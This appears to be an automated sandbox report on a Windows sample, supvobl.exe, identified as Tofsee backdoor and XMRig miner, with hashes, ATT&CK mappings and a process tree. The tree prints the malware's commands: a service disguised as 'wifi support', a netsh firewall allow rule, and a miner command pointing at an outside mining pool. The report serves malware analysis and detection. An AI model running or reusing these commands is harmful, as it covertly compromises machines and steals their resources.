Overview

overview

10

Static

static

supvobl.exe

windows7_x64

10

supvobl.exe

windows10_x64

10

Resubmissions

23-01-2023 11:03

230123-m5q8hada22 10

23-01-2023 11:02

230123-m5gdasef3z 10

10-05-2020 02:47

200510-dz18eg1lgs 10

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    10-05-2020 02:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    supvobl.exe

  • Size

    12.5MB

  • MD5

    be286c784044379ca9a6ca6e7211a29f

  • SHA1

    bf8010a0e4b7ae88095bd9ee303707f4c0da549e

  • SHA256

    d05cd710559cb6a23a84f44bfe88b91582862c7d70134cf71807ae0c49964993

  • SHA512

    862e1beffa2cd58cd606a9edf2be79a03ca4a93f2edd6528e91eed2f68ad889e2e76dd43f164cd8f7eb02567504cbcf9581f730177f841a3e5a0298b48674b13

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\supvobl.exe
    "C:\Users\Admin\AppData\Local\Temp\supvobl.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3944
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vsmkwzq\
      2⤵
        PID:3688
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ezdvlwyw.exe" C:\Windows\SysWOW64\vsmkwzq\
        2⤵
          PID:584
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create vsmkwzq binPath= "C:\Windows\SysWOW64\vsmkwzq\ezdvlwyw.exe /d\"C:\Users\Admin\AppData\Local\Temp\supvobl.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:908
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description vsmkwzq "wifi internet conection"
            2⤵
              PID:1092
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start vsmkwzq
              2⤵
                PID:1320
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1700
              • C:\Windows\SysWOW64\vsmkwzq\ezdvlwyw.exe
                C:\Windows\SysWOW64\vsmkwzq\ezdvlwyw.exe /d"C:\Users\Admin\AppData\Local\Temp\supvobl.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1544
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Modifies service
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:2440
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe --algo=cn-heavy/tube -o tube.pool.gntl.co.uk:8080 -u bs3DRuaSUbRjZ3zryBKc1bUv4dxVdTewBfJBQcrHkbC5g4x3pc2QSnebvXwfi3DRoFNFLExjV8MDwBCgejSS6bcr2xFUqWnXA+58000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3796

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Initial Access

              Execution

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              2
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              3
              T1112

              Credential Access

              Discovery

              Lateral Movement

              Collection

              Exfiltration

              Command and Control

              Impact

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\ezdvlwyw.exe
                MD5

                9abe967beb2928d487114515fb0140fc

                SHA1

                5434f58ca1598fab868567f596c12ff69735558a

                SHA256

                c9a5ec669354b9aa8b59cd3eef798ee79e3b23d315b57c2c028973075d08c708

                SHA512

                aba087d616866163b115958692bceeca2cc01d5dc1f4e984726599521876d004a432fa6226e50a47c5e490cb885737d9374fb2b607ab6e4709ae6b5222a3f31e

                Download Submit
              • C:\Windows\SysWOW64\vsmkwzq\ezdvlwyw.exe
                MD5

                9abe967beb2928d487114515fb0140fc

                SHA1

                5434f58ca1598fab868567f596c12ff69735558a

                SHA256

                c9a5ec669354b9aa8b59cd3eef798ee79e3b23d315b57c2c028973075d08c708

                SHA512

                aba087d616866163b115958692bceeca2cc01d5dc1f4e984726599521876d004a432fa6226e50a47c5e490cb885737d9374fb2b607ab6e4709ae6b5222a3f31e

                Download Submit
              • memory/1544-4-0x0000000002EEC000-0x0000000002EEE000-memory.dmp
                Filesize

                8KB

                Download
              • memory/1544-5-0x0000000003350000-0x0000000003351000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2440-6-0x0000000000FB0000-0x0000000000FC5000-memory.dmp
                Filesize

                84KB

                Download
              • memory/2440-8-0x0000000005050000-0x000000000525F000-memory.dmp
                Filesize

                2.1MB

                Download
              • memory/2440-9-0x0000000001150000-0x0000000001156000-memory.dmp
                Filesize

                24KB

                Download
              • memory/2440-10-0x0000000001160000-0x0000000001170000-memory.dmp
                Filesize

                64KB

                Download
              • memory/2440-11-0x0000000003DF0000-0x0000000003DF5000-memory.dmp
                Filesize

                20KB

                Download
              • memory/2440-12-0x00000000096D0000-0x0000000009ADB000-memory.dmp
                Filesize

                4.0MB

                Download
              • memory/2440-13-0x0000000004400000-0x0000000004407000-memory.dmp
                Filesize

                28KB

                Download
              • memory/3796-14-0x0000000001010000-0x0000000001101000-memory.dmp
                Filesize

                964KB

                Download
              • memory/3944-1-0x0000000003430000-0x0000000003431000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3944-0-0x0000000003033000-0x0000000003034000-memory.dmp
                Filesize

                4KB

                Download